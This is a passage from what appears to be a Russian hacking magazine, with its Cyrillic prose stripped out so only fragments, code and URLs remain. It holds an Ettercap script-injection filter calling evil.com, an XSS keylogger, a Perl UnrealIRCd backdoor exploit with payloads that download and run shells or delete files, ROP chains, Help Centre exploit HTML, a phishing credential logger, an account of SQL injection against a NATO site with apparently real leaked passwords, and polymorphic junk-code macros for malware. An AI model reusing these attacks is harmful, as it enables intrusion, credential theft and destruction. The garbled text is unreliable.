HTTP-. , ,
. HTTP-.
, Server .
. ? . ,
- - .
, -
. RFC /
.
(fingerprint) HTTP-, .
, . ,
() , .
:
HTTP-;
:


-
;

;
.

, , .
,
-.
, , . .
, httprint win/nix BT 4 (net-square.com/
httprint/), httprecon win (computec.ch/projekte/
httprecon/. , :).
.

, , , - - . ,

, .
, - , . , net-square.com/
httprint/httprint_paper.html ServerMask IIS.
- - ( )

www.netcraft.com.
DELETE / HTTP/1.0 ;
GET / HTTP/3.0 ;
GET / LALA/1.0 ;
HEAD / ;

.
( , 100
:)) . shodanhq.com.
ujeni.murkyroc.com/

hmap/. computec.ch/projekte/
httprecon/?s=database.

,
-;
(404, ) ;

038

, HTTP-
HTTP-, .

: PHP
.

:
, .
, mod_rewrite (
_).
? , PHP ,
. ,
exploit-db.com. -,
PHP.

:
,
ETTERCAP.

:
.
,
. ,
, .
Ettercap NG.
GUI , .
0.7.3. ettercap.sourceforge.net
nix, . , ,
. :

.
PHP. PHP-,
Fatal Error. :
.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
.php?=SUHO8567F54-D428-14d2-A769-00DA302A5F18

, PHP, ZEND,
, Suhosin ( PHP). PHP.
www.0php.
com/php_easter_egg.php.
, ,
PHP, expose_php=off
php.ini.

PHP
Ettercap, BackTrack 4.
. http_filter.txt
HTTP-.
// TCP, 80
if (ip.proto == TCP && tcp.dst == 80) {

Ettercap NG. .

, , ;
;
Man in the Middle (MitM);
,
.

, Ettercap
.

TCP/IP- .
: -, ; -,
Ettercap HTTP-
, .
, .

039

//
if (search(DATA.data, "Accept-Encoding")) {
//
replace("Accept-Encoding", "Blabla-Blahblah");
//
msg("Accept-Encoding field has been changed\n");
}
}
// TCP, 80
if (ip.proto == TCP && tcp.src == 80) {
replace("</body>", " <script type=\"text/javascript\"
src=\"http://evil.com/sploit.js\"></script> \" ");
// HTML-,
-
replace("</html >",
" <img src=\"http://evil.com/evil.gif\"></img>");
msg("Success!\n"); //
}

Ettercap ,
. .
, 80
TCP.
-. Accept-Encoding ( HTTP-, )
( ). ,
Accept-Encoding , -
. HTML-.
- .
.
. .
- ( TCP, 80).
</body>, </html > , -,
. ?

:
.

:

.
- - ( :)).
,
. .
/
( ). , , , ... ,
http://yehg.net/q. ,
( ) .
- ,
. ,
. -, yehg ,
, .
, , whois , / .. ,
. , ,
. - , .
, - (gosu.pl/wsa/). , JavaScript .
.

040

HTML-
,
. , .. : replace
,
, msg ,
, .
Ettercapa . :
etterfilter http_filter.txt -o http_filter.ef

http_filter.txt , -o http_filter.ef ttercap- ( ).


Ettercap.
ettercap -T -F http_filter.ef -M ARP /192.168.0.1/

-T ,
Ettercap; -F http_filter.ef Etterfilter
; -M ARP /192.168.0.1/ Ettercap,
MitM , arp- ( Ettercap
). 192.168.0.1 IP . , arp-
, ARP ,
,
. Ettercap
, HTML . , Ettercap . ,
. , , , ...
man Ettercap . ,
, , ,
, .

.
, - ,
HTML . ,
. :
CATS["General"] = {
"xakep": "http://www.xakep.ru/local/search/search.asp?text=%s",
};

xakep.ru

%s , , .
General xakep.
.
. , , ,

: ,
XSS .

:
XSS : , . , , , , - .
XSS- . ,
, . XSS ! .
XSS?
: JavaScript,
, , . ( )
, , PHP. JavaScript ( insanesecurity.info):
var keys=''; //
document.onkeypress = function(e) {
//
get = window.event?event:e; //
key = get.keyCode?get.keyCode:get.charCode;
//
key = String.fromCharCode(key); //
keys+=key; //
}
window.setInterval(function(){
//
new Image().src = 'http://_:80/keylogger.
php?keys='+keys; //
keys = ''; //
}, 1000);

(vulnerability or vulnerabilities)
OR (exploits or security holes),
.
, YEHG, ,
. ,
.
.
( ), . ,
.

:
,
PHP-, .
PHP-:
<?php
$log= $_SERVER["QUERY_STRING"]."\r\n";
// js
$fp=fopen("log.txt", "a"); //
fputs($fp, $log); //
fclose($fp);
?>

, ,
XSS .

.
.
- sourceforge.
net/projects/jskeylogger/ ( ). 1.4.
. :
, ID
, .
, exe .
PHP, , .
, . . ,
, .
.
, , , , , .
.z

jskeylogger v1.4 : IP, ID,


041


, Digital Security a.sintsov@dsec.ru


,
, .
. ,
, ,
. .
state-of-art, , .
,
, .

01


UNREAL IRCD

CVE
CVE-2010-2075
TARGETS
Unreal IRCD v. 3.2.8.1

BRIEF
IRC-
Unreal IRCD. , IRC
. Facebook,
Twitter, .
, IRC - .
/ ( ), ,
, WEB 2.0, ,
(BackDoor ) Unreal IRCD.
IRC-
2009 . ,

. ,
.

EXPLOIT
,
Unreal IRCD, .
Metasploit .
, . ,
,
s_bsc.c, read_
packet(). .
readbuf.
, , ,
, , :
#ifdef DEBUGMODE3
if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
DEBUG3_LOG(readbuf);
#endif

042


, DEBUGMODE3_INFO (
DEBUGMODE3). ,
DEBUG3_LOG(). ?
, struct.h.
#define DEBUGMODE3 ((x)->flags & FLAGS_NOFAKELAG)
. . .
#ifdef DEBUGMODE3
#define DEBUGMODE3_INFO "AB"
#define DEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x)
. . .
#define DEBUG3_DOLOG_SYSTEM(x) system(x)

:

AB. , system(), .
:
#!/usr/bin/perl
# Unreal3.2.8.1 Remote Downloader/Execute Trojan
# DO NOT DISTRIBUTE -PRIVATE# -iHaq (2l8)
use Socket;
use IO::Socket;
## Payload options
# .
# unix/linux,
AB;.
# ,
# system(); -
# .
my $payload1 = 'AB; cd /tmp; wget http://

BlazeDVD. ROP
packetstormsecurity.org/groups/synnergy/bindshellunix -O bindshell; chmod +x bindshell; ./bindshell &';
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.
com/bot.txt -O bot; chmod +x bot; ./bot &';
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.
com/r.txt -O rshell; chmod +x rshell; ./rshell &';
my $payload4 = 'AB; killall ircd';
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr
*';
$host
$port
$type
$host
$port
$type

=
=
=
=
=
=

"";
"";
"";
@ARGV[0];
@ARGV[1];
@ARGV[2];

if ($host eq "") { usage(); }


if ($port eq "") { usage(); }
if ($type eq "") { usage(); }
sub usage {
printf "\nUsage :\n";
printf "perl unrealpwn.pl <host> <port> <type>\n\n";
printf "Command list :\n";
printf "[1] - Perl Bindshell\n";
printf "[2] - Perl Reverse Shell\n";
printf "[3] - Perl Bot\n";
printf "-----------------------------\n";
printf "[4] - shutdown ircserver\n";
printf "[5] - delete ircserver\n";
exit(1);
}
sub unreal_trojan {
my $ircserv = $host;
my $ircport = $port;
#
my $sockd = IO::Socket::INET->new (PeerAddr =>
$ircserv, PeerPort => $ircport, Proto => "tcp") || die
"Failed to connect to $ircserv on $ircport ...\n\n";
print "[+] Payload sent ...\n";
#
if ($type eq "1") {
print $sockd "$payload1";

} elsif ($type eq "2") {


print $sockd "$payload2";
} elsif ($type eq "3") {
print $sockd "$payload3";
} elsif ($type eq "4") {
print $sockd "$payload4";
} elsif ($type eq "5") {
print $sockd "$payload5";
} else {
printf "\nInvalid Option ...\n\n";
usage();
}
close($sockd);
exit(1);
}
unreal_trojan();
# EOF

SOLUTION
, ,
, , MD5-
. 752e46f2d873c1679fa99de3f52a274d, 7b741e94e867c0a7370553fd01506c66. IRC-
( - ,
).

02


BLAZEDVD PLAYER

CVE
N/A
TARGETS
BlazeDVD Player 5.1
BRIEF
,

. , Windows 7,
, DEP ASLR. -,
mr_me, (Steven Seeley). ,
, ,
( https://net-ninja.net). ,
Corelan Security Team, ,

043

Acrobat Reader. . SWF- PDF

corelanc0d3r, 10- ,
, - . ,
.
BlazeDVD.

EXPLOIT
cst-blazedvd.plf, BlazeDVD Player
MessageBoxA ,
:). Windows 7 . -, ,
( ) ,
.
MessageBox ,
Windows 7
. ,
( SEH ),
- , ,
VirtualProtect, -
(VirtualProtect/MessageBox).
, , ROP, .
,
.
,
- .
RETN,
, .
, . mr_me
, , ASLR
. ,
ASLR,
( ROP, Forb
( . .)). ROP . :
SEH
. ROP .
mr_me
. (,
) :
0x616074AE : ADD ESP, 408
0x616074B4 : RETN 4
; ,

, ROP- , RETN
4 , mr_me.
ROP ,

044

( ... , , ...)
- . . ROP
. , , .

SOLUTION
, .
. ,
, /dynamicbase /
GS- . SEHOP
,
.

03


FLASH PLAYER

CVE
CVE-2010-1297
TARGETS
Adobe Acrobat Reader < 9.4
Adobe Flash Player < 10.1
BRIEF
0day-
Adobe. ?
SWF Flash. , , , Acrobat Reader. ,
-,
. Metasploit. ...

EXPLOIT
, ,
, SWF-,
, AES-PHP.swf, . , ,
- 0x66 (GetProperty)

<---- 0x0C0C0C0C+0x8 = EAX+8 (1)


0x700156f,
# mov eax,[ecx+0x34] / push [ecx+0x24] /
call [eax+8] ;( 1)
0xcccccccc,
0x7009084,
# ret ( 4)
0x7009084,
# ret ( 5)
0x7009084,
# ret ( 6)
0x7009084,
# ret ( 7)
0x7009084,
# ret ( 8)
0x7009084,
# ret ( 9)
0x7009033,
# ret 0x18 ( 10)
0x7009084,
# ret
0xc0c0c0c,
# <---- 0x0C0C0C0C+0x34, ESP (2)
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret ( 11)
0x7009084,
# ret ( ROP)
....

Acrobat Reader. heap-spray

- 0x40 (newfunction). ,
.
, SWF-, PDF heap-spray
JavaScript. , . , DEP,
ROP-,
.
ROP-
. ( - newfunction)
ECX 0x0C0C0C0C, call [ecx+0c]. ,
heap-spray.
, 0x0C0C0C0C
+ 0xC : 0x700156f.
call 0x700156f. BIB.dll
:
mov eax,[ecx+0x34]
; ECX heap-spray (0x0C0C0C0C)
; 0x0C0C0C0C+0x34
0x0C0C0C0C
; EAX
push [ecx+0x24]
call [eax+8]
; 0x0C0C0C0C+0x8 0x70048ef

0x70048ef , :
xchg eax,esp
ret

; EAX=0x0C0C0C0C, ESP
;

heapspray.
( 4 ,
0x0C0C0C0C).
0x7004919,
# pop ecx / pop ecx / mov [eax+0xc0],1 /
pop esi / pop ebx / ret ;( 3)
0xcccccccc,
0x70048ef,
# xchg eax,esp / ret ;( 2)

, - RETN.
CALL JMP,
-.

SOLUTION
Flash 10.1 , -
. , BIB.dll,
, , ASLR,
Windows 7
.

04


WINDOWS HELP CENTRE

CVE
CVE-2010-1885
TARGETS
Windows XP
BRIEF
, . (Tavis
Ormandy), , , ,
.
0day JAVA Deployment Tool Kit, Windows XP, , .
,
, . Microsoft' ,
, , .
,
.
.
Microsoft - ,
Google . , ? .
, ,
security-research. Google

045

,
. REF , ,
PARAM name="HTMLView"
starthelp.html:

Windows Help Center. .

; , , .
. Immunity
, , , , ,
.
, ...
, . ,
. .
NO MORE FREE BUGS. ,

, .
...

EXPLOIT
(helpctr.exe), , URL ,
hcp://.
, . , , , .
, XSS .
hcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</h1>

,
: : <script defer>eval(unescape('Run("calc.exe")'))</script>. - IE8
.
Windows Media Player... , ... ,
, ,
ActiveX. URL,
, ASX-, ,
, , , :
<ASX VERSION="3.0">
<PARAM name="HTMLView"
value="http://ZLOI-URL/starthelp.html"/>
<ENTRY>
<REF href="http://ZLOI-URL/bug-vs-feature.jpg"/>
</ENTRY>
</ASX>


<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">


, . ,
hex' unescape-, .
, IE7 -
... . Media Player'
- , :
<html><head><title>Testing HCP</title></head>
<body><h1>OK</h1>
<script>
// HCP:// Vulnerability, Tavis Ormandy, June 2010.
var asx = "http://ZLOI-URL/simple.asx"; //
// IE, asx.
if (window.navigator.appName
== "Microsoft Internet Explorer") {
// Internet Explorer
var o = document.createElement("OBJECT");
o.setAttribute("classid",
"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
o.openPlayer(asx); //!
// IE, asx ,
// ,
// ...
} else {
// Mozilla, Chrome, Etc.
var o = document.createElement("IFRAME");
o.setAttribute("src", asx);
document.body.appendChild(o); //!
}
</script>
</body></html>

, , ZLOI-URL.
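The hcp:// URLs above pack three things a content filter or an analyst should pull apart: the protocol handler itself, the percent and %uXXXX escaping that hides the ..\..\ traversal, and the script injected through svr=. As an added example (not from the article) the Python below decodes such a URL one layer at a time and flags the traversal, the markup and the run of malformed %A% escapes; the ASX check looks for the HTMLView parameter shown above. The regexes, the constructed sample strings (with a much shorter %A% run than the real page) and the scoring are this example's assumptions, not part of the original exploit.

```python
"""Flag hcp:// URLs and ASX HTMLView redirects of the shape used in the
Help Center bug: decode one escaping layer and look for traversal/markup."""
import re
from urllib.parse import unquote

HCP_URL = re.compile(r"hcp://[^\s\"'<>]+", re.IGNORECASE)
HTMLVIEW = re.compile(r'<PARAM\s+name="HTMLView"\s+value="([^"]+)"', re.IGNORECASE)
UNICODE_ESC = re.compile(r"%u([0-9A-Fa-f]{4})")
# a '%' that starts neither a %XX nor a %uXXXX escape (e.g. the %A% runs)
INVALID_ESC = re.compile(r"%(?![0-9A-Fa-f]{2})(?!u[0-9A-Fa-f]{4})")


def decode_hcp(url: str) -> str:
    """One decoding round: %uXXXX first (the payload writes '?' that way),
    then %XX. Nested escapes such as %2528 come out as %28 and stay visible."""
    s = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), url)
    return unquote(s)


def inspect_hcp_url(url: str) -> dict:
    decoded = decode_hcp(url)
    return {
        "url": url,
        "decoded": decoded,
        "traversal": "..\\" in decoded or "../" in decoded,
        "script": "<script" in decoded.lower(),
        "invalid_escapes": len(INVALID_ESC.findall(url)),
        "unicode_escapes": len(UNICODE_ESC.findall(url)),
        "asx_htmlview": False,
    }


def inspect_content(text: str) -> list:
    """Run over an HTML page or an ASX file and return one finding per hit."""
    findings = [inspect_hcp_url(m.group(0)) for m in HCP_URL.finditer(text)]
    for m in HTMLVIEW.finditer(text):
        # HTMLView makes the player render a remote page, which is how the
        # hcp:// iframe is reached without a browser prompt
        findings.append({"url": m.group(1), "decoded": m.group(1), "traversal": False,
                         "script": False, "invalid_escapes": 0, "unicode_escapes": 0,
                         "asx_htmlview": True})
    return findings


def is_suspicious(f: dict) -> bool:
    return f["asx_htmlview"] or f["traversal"] or f["script"] or f["invalid_escapes"] > 0


# Constructed samples (shortened %A% run; the real page used a much longer one)
SAMPLE_IFRAME = (
    '<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm'
    + "%A%" * 12
    + '..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">'
)
SAMPLE_ASX = ('<ASX VERSION="3.0"><PARAM name="HTMLView" value="http://ZLOI-URL/starthelp.html"/>'
              '<ENTRY><REF href="http://ZLOI-URL/bug-vs-feature.jpg"/></ENTRY></ASX>')
BENIGN = '<a href="hcp://system/sysinfo/sysinfomain.htm">system information</a>'

if __name__ == "__main__":
    for sample in (SAMPLE_IFRAME, SAMPLE_ASX, BENIGN):
        for finding in inspect_content(sample):
            print(is_suspicious(finding), finding["decoded"][:80])
```

The decoder deliberately stops after one round: the second round (the JavaScript unescape that turns Run%28%22calc.exe%22%29 into Run("calc.exe")) happens inside the Help Center page, and seeing the intermediate form is what tells an analyst which layer the whitelist check looked at.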

SOLUTION
hcp ( HKCR\HCP\shell\open)
.
http://lock.cmpxchg8b.com/
b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip.
helpctr.exe, .
Microsoft. z


. ,
, , - 5
, WiFi-
( ). , ,
, ,
. , , ,
, ,
. ,
. , ,
-.
:
, ( , ). ,
, .
- ,
WiFi-, , , .

, . -,
: , !,

.. ..
, .
, , (
. .) -
-
.
, , ,
. ,
, ( 10
) .
? , ,
(
!).


, ,

ARP- IP

DVD

,



(MACChange,
Small HTTP Server,
WireShark
, Ufasoft
Sniffer, InterCepter),
PHP-,

WARNING


!
,


- ,
.
,
( ).
:).
( ,
, ..).

... !

, , WireShark
.
SSL- ...
, :
WEP/WPA-,
.
(
SMS- ), ,
, , .
, SSL-

, XOR
( Ufasoft Sniffer
InterCepter) ,
( ... :).
( ,
IP- , ).
, , , (
!) - (
:). IP MAC-,
( ARP-),
.
,
, .
,
:).
, MACChange ( , ) .
IP.
. , ,

DHCP-, Static-. ,
,
. , !

, ?..

, , .
, ? MitM-, .
.
: -,
.
, DIR-300 DHCP-.
SSID
.
-
Small HTTP Server.
.
, ,
.
WEB- DNS-, - -
HTML-, .
PHP-, txt-.
<?php
// Phishing form handler: appends the submitted login/password pair to a text file
$filename = 'S:\home\localhost\www\info.txt';
$a = $_GET['login'];
$b = $_GET['password'];
$somecontent = " -- - \n".$a." -- - \n".$b." -- \n";

if (is_writable($filename)) {
    // 'a' appends; opening with 'r+' (as originally written) overwrites the
    // start of the file on every submission, so only the last victim survives
    if (!$handle = fopen($filename, 'a')) {
        echo "Cannot open file ($filename)";
        exit;
    }
    if (!fwrite($handle, $somecontent)) {
        echo "Cannot write to file ($filename)";
        exit;
    }
    echo "Wrote ($somecontent) to file ($filename)";
    fclose($handle);
} else {
    echo "The file $filename is not writable";
}
?>

MACChange. -

, !

MITM

:
.

SSID, .
, .
,
.
. , , .

PHP- .

(, , :) . .).
,
: ,
, ,
, .
. ! , ,
: -
.
SSL- .

? , ( ).
.

, .
,
,
(, , ).
:
, ,
(
VPN-),
. z

txt-




ANTI-NATO natobreak@yahoo.com

, , ,
-.
. ,
, .
. ,
. , , , .
,
, , ( ).
, .
, SQL-,
XSS, LFI/RFI ,
.
,
.
, , ,
, -
. ,
( Acunetix, nikto, w3af sqlmap)


-. , ,

,
, .
, , , ,
?
, .

, , , -
, -
, .
( ) ,
, .
, ,
- .

,


, Research & Technology Organisation (RTO),
.

. - , , , , .
, ?

-
. -,
- ,
. , ,
, ,
- RTO.NATO.INT. ,
,
, ,
.
,
.
, robots.txt:
User-agent: *
Disallow: /images/
Disallow: /img/
Disallow: /homepix/
Disallow: /rndimg/
Disallow: /Include/
Disallow: /hpix/
Disallow: /Mailer/
Disallow: /InfoPack/
Disallow: /aspx/
Disallow: /bin/
Disallow: /cgi-bin/
Disallow: /ContactUs.aspx
Disallow: /Copyright.htm
Disallow: /css/
Disallow: /Detail.asp
Disallow: /enrolments/
Disallow: /FAQ.htm
Disallow: /foad.htm
Disallow: /fr/
Disallow: /help.htm
Disallow: /pfp.ppt
...
Disallow: /Prog/
Disallow: /Reports.asp
Disallow: /SendAbstractDetails.aspx
Disallow: /tor.asp

Disallow: /Taxo/
Disallow: /Variables.asp
Disallow: /variables.asp
Disallow: /voc.htm
Disallow: /vpn.html
Disallow: /Webmail.asp
Disallow: /yourws.asp
Sitemap: http://www.rto.nato.int/sitemap.xml

2010 , RTO
, (pfp.ppt).
nikto ,
-? ,
nikto , :
- Nikto v2.03/2.04
-----------------------------------------------------
+ Target IP:       62.23.200.67
+ Target Hostname: www.rto.nato.int
+ Target Port:     80
+ Start Time:      2010-05-08 14:00:15
-----------------------------------------------------
+ Server: RTA Web Server
- /robots.txt - contains 47 'disallow' entries which should be manually viewed. (GET)
- Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
- Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OSVDB-877: HTTP method ('Public' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ OSVDB-0: ETag header found on server, fields: 0x7036cddda14ca1:18b2
+ OSVDB-3092: GET /sitemap.xml : This gives a nice listing of the site content.
+ 3577 items checked: 49 item(s) reported on remote host
+ End Time:        2010-05-08 14:49:54 (2979 seconds)
-----------------------------------------------------
+ 1 host(s) tested
Test Options: -Cgidirs all -vhost www.rto.nato.int -host www.rto.nato.int www.rto.nato.int
-----------------------------------------------------


, , Windows , LFI

- ( ,
, nikto :)),
. , , webmail.
a sp ,
Detail.asp -.
disallow
robots.txt, webscarab.
,
sqlmap' w3af'. ,
, , topics. ,
:
http://www.rto.nato.int/Main.asp?topic=Main.asp

, .ASP, (, Main.asp



1990- .
,
( ,
, ,
, ).
, .
,

. ,
, . ,

.
,
.


- BASE64

topic, - ,
Main.asp ,
pfp.ppt,
.
... . , , :
http://www.rto.nato.int/Main.asp?topic=../../../../..
/../../../../../../etc/passwd

ORACLE , ORACLE

, -, - Oracle,
SQL- XSS.
Oracle -
( ),
SQL-. , -

(
). SQL-
, -,
.
. ,
+or+chr(77)=chr(77). chr() ,
.
RTO. , ,
:
:
http://www.rto.nato.int/Detail.asp?ID=1+or+chr(77)=chr(77)
Oracle:
http://www.rto.nato.int/Detail.asp?ID=1+or+1=(SELECT+1+FROM+DUAL)

, ,
(backend) Oracle, MySQL SQLite (,
SQL-
). , Oracle
. !
.
, ,
. ,
,
Perl.
,
,
:
) :
http://www.rto.nato.int/Detail.
asp?ID=-1+OR+(select+length(table_
name)+from+user_tables+where+'%

%'+AND+rownum=1)=% , %

) (
):
http://www.rto.nato.int/Detail.asp?ID=1+OR+(select+substr(column_name,%
%,1)+from+all_tab_columns+where+table_
name='.% %.'+AND+'%
%'+AND+rownum=1)=chr(% %)

,
, rownum
SQL- Oracle,
.
:). , ,
( )
Oracle. ,
,
PASSWORD. c
.
, :).

:
RTO_MEMBERS.MEMBER_PASSWORD
RTO_PANEL.PANEL_PASSWORD
USER_DB_LINKS.PASSWORD
CONTACTLOGIN.CLO_PASSWORD
APPLICATIONLOGIN.PASSWORD
CONTACT.CLO_PASSWORD

, , ,
.
USERNAME: RTAMASTER
PASSWORD: droopy
DB_LINK: TEST.RTA.INT
USERNAME: WISE


Main.asp
PASSWORD: BUGSBUNNY
DB_LINK: WISE_LINK

,
. , ,
.

:
DB Scanning table rto_panel
..........[DBG: FOUND NUMBER 29.]
DB NUMBER OF ROWS FOUND: 29
Getting row 1
DB getting panel_webname
.......[DBG: FOUND NUMBER 1.]
.........[DBG: FOUND SYMBOL ' ' - 32]
DB
DB getting panel_password
.......[DBG: FOUND NUMBER 16.]
........[DBG: FOUND SYMBOL '' - 245]
........[DBG: FOUND SYMBOL '' - 191]
. . .
.........[DBG: FOUND SYMBOL '$' - 36]
.........[DBG: FOUND SYMBOL '' - 168]
DB )z54<!*t$
DB 245|191|201|41|122|24|60|198|33|196|42|192|116|164
|36|168|
DB getting panel_number
.......[DBG: FOUND NUMBER 7.]
.........[DBG: FOUND SYMBOL 'R' - 82]
. . .
........[DBG: FOUND SYMBOL 'A' - 65]
DB RTA-CSA
DB getting panel_alias
.......[DBG: FOUND NUMBER 7.]
. . .


........[DBG: FOUND SYMBOL 'A' - 65]


DB RTA-CSA

"panel_webname"
"panel_password", MD5 .
. , , .

- , RTO.
"SINGLE SIGN-ON",

:
Please authenticate to access website protected areas
and the RTO collaborative environment. Use your RTO
collaborative environment credentials or the RTO
generic credentials to log on.

, , ,
/.
, ( ) . ,
,
RTO.NATO.INT.
,
, ?
. ,

JavaScript-. ,
, HTML md5.js, MD5
RSA Data Security (, ,
).

pw2md5(in_pw, out_md5),
:
<form action="checkident.asp" method="post"
name="frmlogon" onSubmit="return sendData();">
. . .
. . .
function sendData()
{
var FORM = document.frmlogon;
pw2md5(FORM.MemberMatkhau,FORM.MemberMatkhau);
return true;
}

pw2md5().
, MD5 , 16- BASE64-
.
md5.js:
/*
* A JavaScript implementation of the RSA Data
Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 2002.
* Other contributors: Greg Holt, Andrew Kepert,
Ydnar, Lostinet
* Distributed under the BSD License
* See http://pajhome.org.uk/crypt/md5 for more info.
*/
. . .
. . .
/*
* Util method added by minhnn
*/
function pw2md5(password, md5password) {
md5password.value = b64_md5(password.value) + "==";
// password.value = "";
}

,
MD5!
! - BASE64,
MD5 .
motobit.com, :
USERNAME: IST
PASSWORD: AD2F38AEE7B3162D832624DA76983CD2
BASE64: rS84ruezFi2DJiTadpg80g==


- Mozilla Firefox TamperData, POST-


MD5 , . , TamperData... , ,
... , , ,
!. , !

, !

, , SQL
, . Oracle
, SQLite MySQL (
, Oracle , iDefense Labs, ,
).
, XDB.
XDB_PITRIG_PKG.PITRIG_DROPMETADATA, .
10g , Oracle
. ,
, :
declare
a varchar2(32767);
b varchar2(32767);
begin
a:='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
b:='YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY';
a:=a||a; a:=a||a; a:=a||a; a:=a||a; a:=a||a;
a:=a||a;
b:=b||b; b:=b||b; b:=b||b; b:=b||b; b:=b||b;
b:=b||b;
XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(a, b);
end;

,
,
.


, , . ,

, , , .
. , ,
(
), .
, -
:). , -,

. ? z



HellMilitia and my Death icq 884888, http://snipper.ru

, , ,
: ( ), ( ),
(
), ( , ), ( , patch'), .
, , ,
; ...
, !

0XBA11EE PRNG


. ,
ANSI C, .
rndseed = 100500

,
,
,
.

, .

-
FASM,
?
,

.

, ,

.
.
, , timestamp, UNIX-.
: randseed = %t. , ,
0 - 0xDEAD, :
randomize
random_number = rndnum mod 0xDEAD - 1

0XBADC0DE

,
int. int 0xCD
, . :
macro randomize {
randseed = randseed * 1103515245 + 12345
randseed = (randseed / 65536) mod 0x100000000
rndnum = randseed and 0xFFFFFFFF
}

macro gen_int {
randomize
int_val = rndnum mod 0xFF
db 0xCD
db int_val
}

, , , ,


. 4 gen_int
, , : rept 7 { gen_int }.
:

macro freereg {
RREG = NOREG
while (RREG = RESP) | (RREG = REBP) | (RREG = -1)
| (RREG = USEDREG1) | (RREG = USEDREG2)
randomize
RREG = rndnum mod 8
end while
}

cd78 | int 0x78
cda6 | int 0xa6
cdb4 | int 0xb4
cd36 | int 0x36
cdec | int 0xec
cd6a | int 0x6a
cd68 | int 0x68

rept fasm' . -,
, .
lea;
. , :
REAX = 0 ; AL
RECX = 1 ; CL
REDX = 2 ; DL
REBX = 3 ; BL
RESP = 4 ; AH
REBP = 5 ; CH
RESI = 6 ; DH
REDI = 7 ; BH

, .
, :
NOREG    = -1
USEDREG1 = NOREG
USEDREG2 = NOREG
RREG     = NOREG

,
.
, , . .
macro rndreg {
RREG = NOREG
while (RREG = NOREG) | (RREG = RESP) | (RREG = REBP)
randomize
RREG = rndnum mod 8
end while
}

, Esp Ebp , . , :

Esp Ebp , .
, .
( ,
), . lea, , ,
\ . , ?
Entry Point - (Entry Point + ), , ,
0x1000.
. ,
lea , :
macro gen_lea {
freereg
reg = (RREG * 8) + 5
randomize
address = (rndnum mod ((ENTRY_POINT + 0x1000 + 1) - ENTRY_POINT)) + ENTRY_POINT
db 0x8D
db reg
dd address
}

ENTRY_POINT :
entry start
...
start:
ENTRY_POINT = $

, : ENTRY_POINT = $$. , :
8d3db10a4000 | lea edi, [0x400ab1]
8d154c044000 | lea edx, [0x40044c]
8d1d68054000 | lea ebx, [0x400568]
8d05e7024000 | lea eax, [0x4002e7]
8d15db0e4000 | lea edx, [0x400edb]
8d15670f4000 | lea edx, [0x400f67]

, , .
,
,
FPU:
macro gen_fpu {
randomize
type = rndnum mod 0x2F
db 0xD8
db 0xC0 + type
}


XOR_KEY, , .
randomize
XOR_KEY = rndnum mod 0xFF


d8d1 | fcom st0, st1
d8c9 | fmul st0, st1
d8d4 | fcom st0, st4
d8ed | fsubr st0, st5
d8d6 | fcom st0, st6
d8c2 | fadd st0, st2

! , gen_trash,
.
, ,
. , / .
, , :
macro gen_trash length {
repeat length
randomize
variant = randseed mod VARIANTS
if variant = 0
gen_lea
else if variant = 1
gen_fpu
end if
end repeat
}

10 :
gen_trash 10. ,
. \: ; ; (
FPU- ,
? lea, ? ).
,
, .
gen_trash. ,
:
gen_trash 15
mov eax, .CodeStart
USEDREG1 = REAX
gen_trash 27
mov ecx, CodeSize
USEDREG2 = RECX
gen_trash 20
.again:
xor byte[eax], XOR_KEY
gen_trash 37
inc eax
gen_trash 10
loop .again
gen_trash 43



, ,
. , \
, , , , ,
lea eax,[ ecx*4+100 ]... !.. ,
, .

, .

0XACED1A


. , .
,
gen_trash, . ,
.
macro adbg {
randomize
variant = rndnum mod N
randomize
destination = (rndnum mod ((ENTRY_POINT + 0x1000) - ENTRY_POINT)) + ENTRY_POINT
if variant = 0
invoke IsDebuggerPresent
test eax,eax
jnz destination
else if variant = N
.....
end if
}

. .

0XACE API-

, .
Windows API.
, .
API-:
macro gen_trash_api {
randomize
RandomParam1 = rndnum mod 0xFFFFFFFF
randomize
RandomParam2 = rndnum mod 0xFFFFFFFF
randomize
variant = rndnum mod 4
if variant = 0
